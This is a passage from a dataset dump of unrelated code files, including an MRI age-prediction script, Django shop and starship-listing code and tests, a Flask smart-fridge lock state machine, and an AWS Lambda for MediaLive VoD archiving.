all the 3D MRI images from the \r\n dataset\r\n featureDic -- dictionary, the key of the dictionary is the name of the \r\n function (string) that we want to use to extract the features we wish. \r\n The value contains the inputs variables of the functions used to \r\n compute the features. it can can be either a dictionary: \r\n {\"input1\": value1,..., \"inputN\": valueN} or a number. If it is a number \r\n it will be interpreted as the polynomial order on which we want to fit \r\n the given features \r\n OUTPUTS:\r\n featureMatrix -- dictionary, the index of the dictionary corresponds to\r\n the file index of the 3D MRI images. And the value of the dictionary\r\n is a 1D np.array containing all the computed features. \r\n \r\n \"\"\"\r\n \r\n # We create an object of the class Features from the dataset dictionary:\r\n dataSet = ml.Features(datasetDic)\r\n \r\n # Use of the function featureExtraction (from the MachineLearningAlgorithms\r\n # module) to extract the features selected in the dictionary featureDic: \r\n featureMatrix = dataSet.featureExtraction(**featureDic)\r\n\r\n # Number of features:\r\n nFeatures = featureMatrix.shape[1]\r\n print(\"\\nThe features matrix is computed. There are {} different features\".format(nFeatures))\r\n \r\n return featureMatrix\r\n\r\nprint(\"\\nFunctions loaded\")\r\n\r\n\r\n#%% LOADING OF THE LABELS OF THE TRAINING DATASET:\r\n\r\n# File name where is the labels of the training dataset:\r\nstrLabel = \"targets.csv\"\r\n\r\n# Loading of the labels of the training dataset:\r\nlabel = np.genfromtxt(path+strLabel, delimiter=',').astype(int)\r\n\r\n# Number of labeled patients, i.e number of 3D MRI images:\r\nnSamples = label.size\r\n \r\nprint(\"\\nLabels loaded. There are \" + str(nSamples) + \" samples in the dataset\")\r\n\r\n\r\n#%% LOADING OF THE LABELED DATASET:\r\n\r\n# Name of the training dataset folder\r\nstrDataset = \"set_train\"\r\n\r\n# Common name of each file of the training dataset folder\r\nstrName = \"train_\"\r\n\r\n# Loading of the images from the training dataset and saving in a dictionary:\r\ndatasetDic = loadData( path, strDataset, strName, nSamples )\r\n\r\nprint(\"\\nThe dataset dictionary containing all the 3D images of the labeled \\\r\ndataset has been created\") \r\n\r\n\r\n#%% FEATURES EXTRACTION:\r\n \r\nml = importlib.reload(ml)\r\n\r\n# We create a dictionary containing the features we want. 
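`loadData` above trims the volumes with hand-tuned per-axis limits. If the intent is literally to drop the all-zero margins, the bounding box can be computed from the data instead; a hedged `numpy` sketch (assumes at least one non-zero voxel):

```python
import numpy as np

def crop_to_nonzero(volume):
    # Bounding box of all non-zero voxels, one slice per axis.
    nz = np.nonzero(volume)
    slices = tuple(slice(idx.min(), idx.max() + 1) for idx in nz)
    return volume[slices]

vol = np.zeros((8, 8, 8))
vol[2:5, 3:6, 1:4] = 1.0
print(crop_to_nonzero(vol).shape)  # (3, 3, 3)
```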
It should respect \r\n# the following construction rules:\r\n# 1) The key is the name of the function (string) that we want to use \r\n# to extract the features we wish. \r\n# 2) The value represents the parameters of the used function knowing\r\n# that:\r\n# - the parameters can be either a dictionary: {\"input1\": value1,\r\n# ..., \"inputN\": valueN} or a number. If it is a number it will \r\n# be interpreted as the polynomial order on which we want to fit \r\n# the given feature\r\nfeatureDic = {}\r\n\r\n# Feature dictionary used for obtaining our best score:\r\nfeatureDic[\"gridOperation\"] = { \"nGrid\":(15,15,15), \"npoly\":1, \\\r\n \"typeOp\":[\"mean\",\"var\"]}\r\n \r\n# Extraction of the features we want from the training dataset:\r\nfeatureMatrix = featuresExtraction( datasetDic, featureDic)\r\n\r\n\r\n#%% CROSS VALIDATION PREDICTION AND SCORES:\r\n \r\nml = importlib.reload(ml)\r\n\r\n# We create an object of the class Prediction to be able to use the functions\r\n# of this class in particular for predicting the data:\r\ndata2Predict = ml.Prediction(featureMatrix, label) \r\n\r\n# We use cross validation to check the accuracy (mean-squared error) of the \r\n# chosen features and regularizer parameter (in Ridge or Lasso):\r\n#MSECV = data2Predict.crossValidation(nFold=10, typeCV=\"random\")\r\n\r\n#print(\"After cross-validation, we obtain a score of {}\".format(MSECV)) \r\n\r\n\r\n#%% COMPUTATION OF THE MODEL PARAMETERS ON THE WHOLE LABELED DATASET:\r\n \r\n# After having checked the accuracy of our feature selection and linear \r\n# regression method, the parameters of our model are determined over the \r\n# whole training dataset: \r\nmodelParameters = data2Predict.buildClassifier(featureMatrix, \\\r\n label, method = \"RidgeCV\")\r\n\r\n# Prediction of the data using the model parameters:\r\n_, MSESelf = data2Predict.predict(modelParameters, featureMatrix,\\\r\n labelValidation = label) \r\n\r\nprint(\"Our model tested on the data used for training gives a score of {}\".format(round((MSESelf),3))) \r\n\r\n\r\n#%% LOADING OF THE NON-LABELED DATASET: \r\n \r\nml = importlib.reload(ml)\r\n\r\n# Name of the test dataset folder\r\nstrDataset = \"set_test\"\r\n\r\n# Common name of each file of the test dataset folder\r\nstrName = \"test_\"\r\n\r\n# Loading of the images from the test dataset and saving in a dictionary:\r\ndatasetTestDic = loadData( path, strDataset, strName, 138 )\r\n\r\nprint(\"\\nThe dataset dictionary containing all the 3D images of the test \\\r\n dataset has been created\") \r\n\r\n# Extraction of the features of the test dataset:\r\nfeatureMatrixTest = featuresExtraction(datasetTestDic, featureDic)\r\n\r\n\r\n#%% PREDICTION FOR THE NON-LABELED DATASET:\r\n\r\nml = importlib.reload(ml)\r\n \r\n# We create an object of the class Prediction from the test dataset dictionary: \r\nunlabeledData= ml.Prediction(featureMatrixTest)\r\n\r\n# The labels of the test data set are predicted using the parameters of our \r\n#model:\r\ntestPrediction = unlabeledData.predict(modelParameters, featureMatrixTest)\r\n\r\n## Plot the predicted data and the true data:\r\n#plt.figure(102)\r\n#\r\n# # X-axis:\r\n#x = np.linspace(1, 138, 138)\r\n# \r\n## Plot of the predicted labels:\r\n#plt.plot(x, testPrediction, color=\"blue\", linewidth=1, \\\r\n# linestyle='--', marker='o')\r\n#plt.xlabel(\"Patient number\")\r\n#plt.ylabel(\"Age\")\r\n\r\nprint(\"\\n The prediction for the non-labeled dataset\") \r\n\r\n#%% WRITING OF THE PREDICTION INTO A .CSV FILE:\r\n\r\n# Name of the file 
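The pipeline above extracts grid mean/variance features and fits a `RidgeCV` model through the project's `ml.Prediction` wrapper, which is not reproduced here. A minimal hedged scikit-learn baseline showing the same fit-and-score shape on synthetic stand-in data:

```python
import numpy as np
from sklearn.linear_model import RidgeCV
from sklearn.model_selection import cross_val_score

rng = np.random.RandomState(0)
X = rng.rand(100, 20)                         # stand-in feature matrix
y = X @ rng.rand(20) + 0.1 * rng.randn(100)   # stand-in target ages

model = RidgeCV(alphas=np.logspace(-3, 3, 13))
print(cross_val_score(model, X, y, cv=10,
                      scoring='neg_mean_squared_error').mean())
```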
which will contain our predictions for the test dataset:\r\nfileStr = 'newSubmission.csv'\r\n\r\nfileIO = open( path + fileStr,'w' )\r\nfileIO.write( 'ID,Prediction\\n' )\r\nanswer = np.rint(testPrediction).astype(int)\r\nfor i in range( len( testPrediction ) ):\r\n fileIO.write( str(i+1) + ',' + str(answer[i]).strip('[]') + '\\n' )\r\nfileIO.close()\r\n\r\nprint(\"\\n The prediction has been written in a .csv file\")","sub_path":"age-prediction/predict_final.py","file_name":"predict_final.py","file_ext":"py","file_size_in_byte":8621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"632104682","text":"#\n# @lc app=leetcode id=46 lang=python3\n#\n# [46] Permutations\n#\n\n# @lc code=start\nclass Solution:\n def permute(self, nums: List[int]) -> List[List[int]]:\n \n used = [0]*len(nums)\n res = []\n\n def dfs(used, cur):\n if len(cur) == len(nums):\n res.append(cur)\n return\n for i in range(len(nums)):\n if used[i]:\n continue\n used[i] = 1 \n dfs(used, cur + [nums[i]])\n used[i] = 0\n \n dfs(used, [])\n return res\n# time: O(n!*n) backtrack 调用次数O(n!). 我们需要将当前答案使用 O(n) 的时间复制到答案数组中\n# space: O(n)\n \n# @lc code=end\n\n","sub_path":"46.permutations.py","file_name":"46.permutations.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"409344368","text":"\"\"\"Extremes.\"\"\"\n# -*- coding: utf-8 -*-\n\n# standard\nfrom functools import total_ordering\nfrom typing import Any\n\n\n@total_ordering\nclass AbsMax:\n \"\"\"An object that is greater than any other object (except itself).\n\n Inspired by https://pypi.python.org/pypi/Extremes\n\n Examples::\n\n >>> import sys\n\n >>> AbsMax > AbsMin\n True\n\n >>> AbsMax > sys.maxint\n True\n\n >>> AbsMax > 99999999999999999\n True\n\n .. versionadded:: 0.2\n \"\"\"\n\n def __ge__(self, other: Any) -> bool:\n \"\"\"GreaterThanOrEqual.\"\"\"\n return other is not AbsMax\n\n\n@total_ordering\nclass AbsMin:\n \"\"\"An object that is less than any other object (except itself).\n\n Inspired by https://pypi.python.org/pypi/Extremes\n\n Examples::\n\n >>> import sys\n\n >>> AbsMin < -sys.maxint\n True\n\n >>> AbsMin < None\n True\n\n >>> AbsMin < ''\n True\n\n .. 
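The `AbsMax`/`AbsMin` doctests above still reference Python 2's `sys.maxint` and compare the bare classes; on Python 3 the equivalent check uses `sys.maxsize` and instances. A hedged runnable variant of the `AbsMax` half:

```python
import sys
from functools import total_ordering

@total_ordering
class AbsMax:
    # total_ordering derives the remaining comparisons from __ge__
    # plus the default identity-based __eq__.
    def __ge__(self, other):
        return other is not AbsMax

print(AbsMax() > sys.maxsize)  # True
print(AbsMax() > 10 ** 30)     # True
```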
versionadded:: 0.2\n \"\"\"\n\n def __le__(self, other: Any) -> bool:\n \"\"\"LessThanOrEqual.\"\"\"\n return other is not AbsMin\n","sub_path":"validators/_extremes.py","file_name":"_extremes.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"70623012","text":"from storefront.models import Product, Category\n\ndef getCatTree(currentCat = None):\n\t\"\"\"\n\t\tcurrentCat - int or None\n\n\t\tNone: returns top level categories and one level of subcategories\n\t\t: like None but with tree of subcategories to passed category\n\t\"\"\"\n\ttop = [ currentCat ]\n\tif currentCat:\n\t\tcurCat = Category.objects.get(id = currentCat)\n\t\ttop = getTopId(curCat, top)\n\n\tcategories = Category.objects.all().filter(parent = None, enabled = True)\n\n\tdef getTreeToCat(subs):\n\t\tif len(top):\n\t\t\tnext = top.pop(0)\n\t\t\tfor s in subs:\n\t\t\t\tif s.id == next:\n\t\t\t\t\ts.subs = Category.objects.all().filter(parent = s.id, enabled = True)\n\t\t\t\t\tgetTreeToCat(s.subs)\n\n\t\treturn subs\n\n\tnext = None\n\tif len(top):\n\t\tnext = top.pop(0)\n\t\t\n\tfor c in categories:\n\t\tc.subs = Category.objects.all().filter(parent = c.id, enabled = True)\n\t\tif next and c.id == next:\n\t\t\tgetTreeToCat(c.subs)\n\n\t# for c in categories:\n\t# \tprint \"1%s\" % c.name\n\t# \tif hasattr(c, \"subs\"):\n\t# \t\tfor s in c.subs:\n\t# \t\t\tprint \"2\t%s\" % s.name\n\t# \t\t\tif hasattr(s, \"subs\"):\n\t# \t\t\t\tfor k in s.subs:\n\t# \t\t\t\t\tprint \"3\t\t%s\" % k.name\n\n\treturn categories\n\ndef getTopId(category, parent = []):\n\t\"\"\"\n\t\tcategory - int\n\n\t\tReturns id of the top parent of passed category\n\t\"\"\"\n\tif category.parent and category.parent.id is not None:\n\t\tparent.insert(0, category.parent.id)\n\t\treturn getTopId(category.parent, parent)\n\telse:\n\t\treturn parent","sub_path":"storefront/logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"593086756","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport glob\nimport json\nimport csv\nfrom scipy.io import loadmat\nfrom collections import defaultdict\n\nall_obj = 0\ndata = defaultdict(dict)\ndataList = []\ncount = 0\ncolumn_titles = ['Set Name', 'Video Name', 'nFrame', 'Frame ID', 'ID', 'Init', 'Label', 'Start', 'End', 'Hide', 'Pos', 'Occl', 'Lock', 'Posv']\n\ndataList.append(column_titles)\n\ndataCheck = [['this', 'that', 'other'], ['other', 'this', 'that']]\ncheck = False\nif (not check):\n for dname in sorted(glob.glob('data/annotations/set*')):\n set_name = os.path.basename(dname)\n #print(\"set name: \", set_name)\n\n data[set_name] = defaultdict(dict)\n for anno_fn in sorted(glob.glob('{}/*.vbb'.format(dname))):\n #print(\"anno_fn: \", anno_fn)\n vbb = loadmat(anno_fn)\n\n nFrame = int(vbb['A'][0][0][0][0][0])\n objLists = vbb['A'][0][0][1][0]\n maxObj = int(vbb['A'][0][0][2][0][0])\n objInit = vbb['A'][0][0][3][0]\n objLbl = [str(v[0]) for v in vbb['A'][0][0][4][0]]\n objStr = vbb['A'][0][0][5][0]\n objEnd = vbb['A'][0][0][6][0]\n objHide = vbb['A'][0][0][7][0]\n altered = int(vbb['A'][0][0][8][0][0])\n log = vbb['A'][0][0][9][0]\n logLen = int(vbb['A'][0][0][10][0][0])\n #print(\"vbb data: \", [nFrame, objHide, altered, log.tolist(), logLen])\n\n video_name = os.path.splitext(os.path.basename(anno_fn))[0]\n data[set_name][video_name]['nFrame'] = nFrame\n 
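`getTopId` above takes `parent=[]` as a default argument; mutable defaults are evaluated once at definition time, so calls that omit the argument would keep appending to the same shared list. The bug is latent here because `getCatTree` always passes a list explicitly, but the usual fix is cheap:

```python
def get_top_id(category, parent=None):
    # A fresh list per call; the shared-default pitfall is gone.
    if parent is None:
        parent = []
    if category.parent and category.parent.id is not None:
        parent.insert(0, category.parent.id)
        return get_top_id(category.parent, parent)
    return parent
```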
data[set_name][video_name]['maxObj'] = maxObj\n data[set_name][video_name]['log'] = log.tolist()\n data[set_name][video_name]['logLen'] = logLen\n data[set_name][video_name]['altered'] = altered\n data[set_name][video_name]['frames'] = defaultdict(list)\n\n n_obj = 0\n for frame_id, obj in enumerate(objLists):\n if len(obj) > 0:\n for id, pos, occl, lock, posv in zip(\n obj['id'][0], obj['pos'][0], obj['occl'][0],\n obj['lock'][0], obj['posv'][0]):\n keys = obj.dtype.names\n id = int(id[0][0]) - 1 # MATLAB is 1-origin\n pos = pos[0].tolist()\n occl = int(occl[0][0])\n lock = int(lock[0][0])\n posv = posv[0].tolist()\n\n obj_row = []\n\n datum = dict(zip(keys, [id, pos, occl, lock, posv]))\n datum['lbl'] = str(objLbl[datum['id']])\n datum['str'] = int(objStr[datum['id']])\n datum['end'] = int(objEnd[datum['id']])\n datum['hide'] = int(objHide[datum['id']])\n datum['init'] = int(objInit[datum['id']])\n\n init = int(objInit[datum['id']])\n lbl = str(objLbl[datum['id']])\n start = int(objStr[datum['id']])\n end = int(objEnd[datum['id']])\n hide = int(objHide[datum['id']])\n\n data[set_name][video_name][\n 'frames'][frame_id].append(datum)\n n_obj += 1\n\n obj_row.append(set_name)\n obj_row.append(video_name)\n obj_row.append(nFrame)\n obj_row.append(frame_id)\n obj_row.append(id)\n obj_row.append(init)\n obj_row.append(lbl)\n obj_row.append(start)\n obj_row.append(end)\n obj_row.append(hide)\n obj_row.append(pos)\n obj_row.append(occl)\n obj_row.append(lock)\n obj_row.append(posv)\n\n\n # print(obj_row)\n # if (count == 0):\n # break\n dataList.append(obj_row)\n # if (count == 0):\n # break\n #print(dname, anno_fn, n_obj)\n all_obj += n_obj\n #count+=1\n # if (count == 0):\n # break\n\n print('Number of objects:', all_obj)\n with open('data-annotations.csv', 'wb') as csv_file:\n writer = csv.writer(csv_file)\n for item in dataList:\n writer.writerow(item)\n #json.dump(data, open('data-annotations.json', 'w'))\nelse:\n print('Number of objects:', all_obj)\n with open('data-annotations.csv', 'wb') as csv_file:\n writer = csv.writer(csv_file)\n for item in dataCheck:\n writer.writerow(item)\n","sub_path":"scripts/convert_annotations.py","file_name":"convert_annotations.py","file_ext":"py","file_size_in_byte":4818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"333311679","text":"from flask import Flask, render_template, request, send_from_directory, session, jsonify\nfrom flask_session import Session\n# from gpiozero import Button,LED\n\n\n'''\nState-flow:\n\nstate0:\n door: closed\n magnet: on\n qr code: not recognized\n\n\n if qr-code recognized:\n state_fridge 1\n\nstate1:\n door closed\n magnet: off\n\n\n qr code: was recognized\n\n if door was opened:\n state_fridge 2\n\nstate2:\n door: opened\n magnet: off\n qr code: ...\n\n if door is closed again:\n state_fridge 3\n\nState 3:\n door: closed\n magnet: on\n qr code: ...\n\n show bill\n\n'''\n\n\napp = Flask(__name__)\nsess = Session()\n\n# door_sensor = Button(18)\n# magnet = LED(23)\n\n#set the magnet off; remember the magnet works with inverted logic\n# magnet.on()\n\n@app.route('/get_state')\ndef get_state():\n dict_status = {}\n dict_status[\"session\"] = session[\"status_session\"]\n dict_status[\"magnet\"] = session[\"status_magnet\"]\n dict_status[\"door\"] = session[\"status_door\"]\n\n return(jsonify(dict_status))\n\n# fridge closed, locked\n\n# endpoint is called by an Ajax call when the QR code page is displayed\n# important so that the fridge gets initialized
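`convert_annotations` above opens its CSV with mode `'wb'`, which only works with the Python 2 `csv` module; under Python 3 (which the script's `print(...)` calls suggest), `csv.writer` needs a text-mode handle opened with `newline=''`:

```python
import csv

rows = [['Set Name', 'Video Name'], ['set00', 'V000']]
# Python 3 idiom: text mode, with newline='' so csv controls line endings.
with open('data-annotations.csv', 'w', newline='') as csv_file:
    csv.writer(csv_file).writerows(rows)
```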
\n@app.route('/set_state0')\ndef set_state0():\n session[\"status_session\"] = \"state0\"\n session[\"status_magnet\"] = \"on\"\n session[\"status_door\"] = \"closed\"\n\n # magnet.on()\n\n return (str(session['status_session']) + \" set\")\n\n# qr-code was detected\n# fridge gets unlocked but is still closed\n# endpoint is called automatically when the QR code has been recognized\n@app.route('/set_state1')\ndef set_state1():\n session[\"status_session\"] = \"state1\"\n session[\"status_magnet\"] = \"off\"\n session[\"status_door\"] = \"closed\"\n\n # magnet.off()\n\n # return render_template('index.html', magnet_state=session[\"status_magnet\"], door_state_text=session[\"status_door\"])\n return (str(session['status_session']) + \" set\")\n\n# fridge was opened\n@app.route('/set_state2')\ndef set_state2():\n session[\"status_session\"] = \"state2\"\n session[\"status_magnet\"] = \"off\"\n session[\"status_door\"] = \"open\"\n\n # return render_template('index.html', magnet_state=session[\"status_magnet\"], door_state_text=session[\"status_door\"])\n return (str(session['status_session']) + \" set\")\n\n# fridge was closed, the bill should be displayed\n@app.route('/set_state3')\ndef set_state3():\n session[\"status_session\"] = \"state3\"\n session[\"status_magnet\"] = \"on\"\n session[\"status_door\"] = \"closed\"\n\n # magnet.on()\n # bill_show()\n\n # return render_template('index.html', magnet_state=session[\"status_magnet\"], door_state_text=session[\"status_door\"])\n return (str(session['status_session']) + \" set\")\n\n# function is called periodically.\n# depending on the actual status the state should be updated\n@app.route('/update-state_fridge')\ndef control_update_fridge_state():\n session[\"status_door\"] = \"closed\"\n # door_sensor.value == 1 --> closed\n # door_sensor.value == 0 --> open\n # door_sensor.value\n #if door_sensor.value == 1:\n # session[\"status_door\"] = \"closed\"\n # else:\n # session[\"status_door\"] = \"open\"\n\n # state has not been set yet for some reason\n if str(session.get('status_session')) == \"None\":\n set_state0()\n return(\"status is not set. 
set state0\")\n\n # if state=state1 and status_door = \"open\", set state2\n elif str(session.get('status_session')) == \"state1\" and session[\"status_door\"] == \"open\":\n set_state2()\n\n # if state=state2 and status_door = \"closed\", set state3\n elif str(session.get('status_session')) == \"state2\" and session[\"status_door\"] == \"closed\":\n set_state3()\n\n # return render_template('index.html', magnet_state=session[\"status_magnet\"], door_state_text=session[\"status_door\"])\n return (\"status is set: \" + str(session.get('status_session')))\n\n\n#start the web server on port 1338\nif __name__ == '__main__':\n app.secret_key = \"super secret fridge key\"\n app.run(host='0.0.0.0', port=1338, debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"258543021","text":"n,t=map(int,input().split())\na=list(map(int,input().split()))\nprint(n,t,a)\ntmp=0\nsumm=[0 for i in range(0,n+1)]\nsumm[0]=0\nfor i in range(1,n+1):\n summ[i]=summ[i-1]+a[i-1]\nmaxn=0\nfor i in range(1,n+1):\n for j in range(0,i):\n if (summ[i]-summ[j]<=t) and (j-i>maxn):\n maxn=j-i\nprint(maxn)","sub_path":"Code/CodeRecords/2844/60670/269454.py","file_name":"269454.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"212452910","text":"from django.urls import reverse\nfrom rest_framework import status\n\nfrom shiptrader.models import Starship, Listing\n\n\ndef test_get_starships(api_client, test_data):\n response = api_client.get(reverse('starship-list'))\n\n assert response.status_code == status.HTTP_200_OK\n assert len(response.data) == 6\n\n\ndef test_get_listings(api_client, test_data):\n \"\"\"All active Listings should be shown.\n \"\"\"\n response = api_client.get(reverse('listing-list'))\n\n assert response.status_code == status.HTTP_200_OK\n assert len(response.data) == 5\n\n\ndef test_get_listing_detail(api_client, test_data):\n listing = Listing.objects.first()\n response = api_client.get(reverse('listing-detail', args=[listing.id]))\n\n assert response.status_code == status.HTTP_200_OK\n\n\ndef test_get_listings_by_starship_class(\n api_client, test_data, starship_factory, listing_factory):\n \"\"\"Django-Filter backend should filter by related starship_class field.\n \"\"\"\n new_ship = starship_factory(starship_class='Another Class')\n listing_factory(ship_type=new_ship)\n response = api_client.get(\n reverse('listing-list'), {'ship_type__starship_class': 'Another Class'})\n\n assert response.status_code == status.HTTP_200_OK\n assert len(response.data) == 1\n\n\ndef test_get_listings_ordered_by_price(api_client, test_data, listing_factory):\n listing_factory(price=100)\n response = api_client.get(reverse('listing-list'), {'ordering': 'price'})\n\n assert response.status_code == status.HTTP_200_OK\n listings = response.data\n assert len(listings) == 6\n assert listings[0]['price'] == 100\n\n\ndef test_get_listings_ordered_by_price_descending(api_client, test_data, listing_factory):\n listing_factory(price=100)\n response = api_client.get(reverse('listing-list'), {'ordering': '-price'})\n\n assert response.status_code == status.HTTP_200_OK\n listings = response.data\n assert len(listings) == 6\n assert listings[5]['price'] == 100\n\n\ndef test_get_listings_ordered_by_modified(api_client, test_data, listing_factory):\n listing = 
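The fridge endpoints above implement a four-state machine driven by polling `/update-state_fridge`. One hedged way to keep those transitions declarative, instead of chained `elif`s, is a lookup table keyed on (state, door), mirroring the app's own state names:

```python
# Allowed (state, door) -> next-state transitions, mirroring the app.
TRANSITIONS = {
    ('state1', 'open'): 'state2',
    ('state2', 'closed'): 'state3',
}

def next_state(current, door):
    # Fall back to the current state when no transition applies.
    return TRANSITIONS.get((current, door), current)

print(next_state('state1', 'open'))    # state2
print(next_state('state0', 'closed'))  # state0
```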
listing_factory(name='New listing')\n response = api_client.get(reverse('listing-list'), {'ordering': 'modified'})\n\n assert response.status_code == status.HTTP_200_OK\n listings = response.data\n assert len(listings) == 6\n assert listings[5]['name'] == listing.name\n\n\ndef test_get_listings_ordered_by_modified_descending(api_client, test_data, listing_factory):\n listing = listing_factory(name='New listing')\n response = api_client.get(reverse('listing-list'), {'ordering': '-modified'})\n\n assert response.status_code == status.HTTP_200_OK\n listings = response.data\n assert len(listings) == 6\n assert listings[0]['name'] == listing.name\n\n\ndef test_create_listing(api_client, test_data):\n ship = Starship.objects.first()\n response = api_client.post(\n reverse('listing-list'),\n {\n 'name': 'New listing',\n 'ship_name': ship.name,\n 'price': 666,\n },\n format='json'\n )\n\n assert response.status_code == status.HTTP_201_CREATED\n assert response.data['name'] == 'New listing'\n assert response.data['ship_type'] == ship.id\n assert response.data['price'] == 666\n\n\ndef test_put_listing_deactivate(api_client, test_data):\n listing = Listing.objects.filter(is_active=True).first()\n response = api_client.patch(\n reverse('listing-detail', args=[listing.id]), {'is_active': False})\n\n assert response.status_code == status.HTTP_200_OK\n assert not response.data['is_active']\n listing = Listing.objects.get(id=listing.id)\n assert not listing.is_active\n\n\ndef test_put_listing_activate(api_client, test_data):\n listing = Listing.objects.filter(is_active=False).first()\n response = api_client.patch(\n reverse('listing-detail', args=[listing.id]), {'is_active': True})\n\n assert response.status_code == status.HTTP_200_OK\n assert response.data['is_active']\n listing = Listing.objects.get(id=listing.id)\n assert listing.is_active\n","sub_path":"shiptrader/tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":4045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"41800304","text":"# CloudWatch Channel State Change Event idle -> Running\n# 1. Update Channel State on DDB\n# 2. Update VoD table\n# 3. Notify Mobile Channel Ready\n\n# CloudWatch Channel State Change Event Running -> Idle\n# 1. Update Channel State on DDB\n# 2. Start moving archive file to new location\n# 3. Create .m3u8 file from list of .ts file\n# 4. Add new .m3u8 to DDB for future playing\n# 5. Update VoD table\n\nimport boto3\nimport json\nimport os\nimport uuid\nfrom datetime import datetime\n\n# BOTO3\nmedialive = boto3.client('medialive')\ndynamodb = boto3.resource(\"dynamodb\")\nsns = boto3.client('sns')\ns3 = boto3.resource('s3')\n\nddb_channel = dynamodb.Table(os.environ['ddb_channel'])\nddb_vod = dynamodb.Table(os.environ['ddb_vod'])\narchive_s3 = os.environ['archive_s3']\nvod_s3key = os.environ['vod_s3key']\nCloudFrontVoDURL = os.environ['CloudFrontVoDURL']\n\ndef lambda_handler(event, context):\n # CloudWatch Channel State Change Event idle -> Running\n # 1. Update Channel State on DDB\n # 2. Update VoD table\n # 3. 
Notify Mobile Channel Ready\n if event['detail']['state'] == 'RUNNING' :\n ChannelId = getChannelId(event['detail']['channel_arn'])\n print(f'updating channel {ChannelId} State to RUNNING')\n\n VoDID = str(uuid.uuid4())\n\n ddb_channel.update_item(\n Key={\n 'ChannelId': ChannelId\n },\n UpdateExpression='set #keyState = :State, VoDID = :VoDID',\n ExpressionAttributeNames={\n '#keyState' : 'State',\n },\n ExpressionAttributeValues={\n ':State': 'RUNNING',\n ':VoDID': VoDID\n }\n )\n\n timestamp = datetime.timestamp(datetime.now())\n print(\"start timestamp =\", timestamp)\n\n VoD = {\n 'VoDID' : VoDID,\n 'ChannelId' : ChannelId,\n 'StartTime' : str(timestamp),\n 'EndTime' : None,\n 'VoDEndpoint' : None,\n 'Streamer' : None\n }\n ddb_vod.put_item(Item=VoD)\n\n Channel = ddb_channel.get_item(\n Key={ 'ChannelId': ChannelId }\n )\n ChannelRTMPEndpoint = Channel['Item']['RTMPEndpoint']\n Message = {\n 'Message' : f'Channel {ChannelId} is ready',\n 'RTMPEndpoint' : ChannelRTMPEndpoint\n }\n print(Message)\n sns_publish = sns.publish(\n TopicArn=os.environ['snstopic'],\n Message=json.dumps(Message),\n MessageStructure='string',\n )\n return 'ok'\n\n\n # CloudWatch Channel State Change Event Running -> Idle\n # 1. Start moving archive file to new location\n # 2. Create .m3u8 file from list of .ts file\n # 3. Add new .m3u8 to DDB for future playing\n # 4. Update VoD table\n # 5. Update Channel State on DDB ✅\n elif event['detail']['state'] == 'STOPPED' :\n ChannelId = getChannelId(event['detail']['channel_arn'])\n\n Channel = ddb_channel.get_item(\n Key={ 'ChannelId': ChannelId }\n )\n\n # 1. Start moving archive file to new location\n origins3key = Channel['Item']['VoDS3key']\n VoDID = Channel['Item']['VoDID']\n for obj in s3.Bucket(archive_s3).objects.filter(Prefix=origins3key):\n # Copy object A as object B\n filename = getFilename(obj.key)\n print(f'src: {obj.key}')\n print(f'destination: {vod_s3key}/{VoDID}/{filename}')\n copy_source = {\n 'Bucket': archive_s3,\n 'Key': obj.key\n }\n destbucket = s3.Bucket(archive_s3)\n obj = destbucket.Object(f'{vod_s3key}/{VoDID}/{filename}')\n obj.copy(copy_source)\n\n for obj in s3.Bucket(archive_s3).objects.filter(Prefix=origins3key):\n s3.Object(archive_s3, obj.key).delete()\n print(f'deleted {obj.key}')\n\n # 2. Create .m3u8 file from list of .ts file\n # 3. Add new .m3u8 to DDB for future playing\n # 4. Update VoD table\n timestamp = datetime.timestamp(datetime.now())\n print(\"end timestamp =\", timestamp)\n VoDEndpoint = f'https://{CloudFrontVoDURL}/{vod_s3key}/{VoDID}/index.m3u8'\n ddb_vod.update_item(\n Key={\n 'VoDID': VoDID\n },\n UpdateExpression='set EndTime = :EndTime, VoDEndpoint = :VoDEndpoint',\n ExpressionAttributeValues={\n ':EndTime': str(timestamp),\n ':VoDEndpoint' : VoDEndpoint\n }\n )\n\n # 5. 
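Step 1 of the STOPPED branch above "moves" the archive by copying each object and then deleting the original, since S3 has no rename operation. A hedged helper capturing that pattern (bucket and prefix names are placeholders):

```python
import boto3

def s3_move_prefix(bucket_name, src_prefix, dst_prefix):
    # S3 has no rename: copy each object under the prefix, then delete it.
    s3 = boto3.resource('s3')
    bucket = s3.Bucket(bucket_name)
    for obj in bucket.objects.filter(Prefix=src_prefix):
        filename = obj.key.rsplit('/', 1)[-1]
        bucket.Object(f'{dst_prefix}/{filename}').copy(
            {'Bucket': bucket_name, 'Key': obj.key})
        obj.delete()
```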
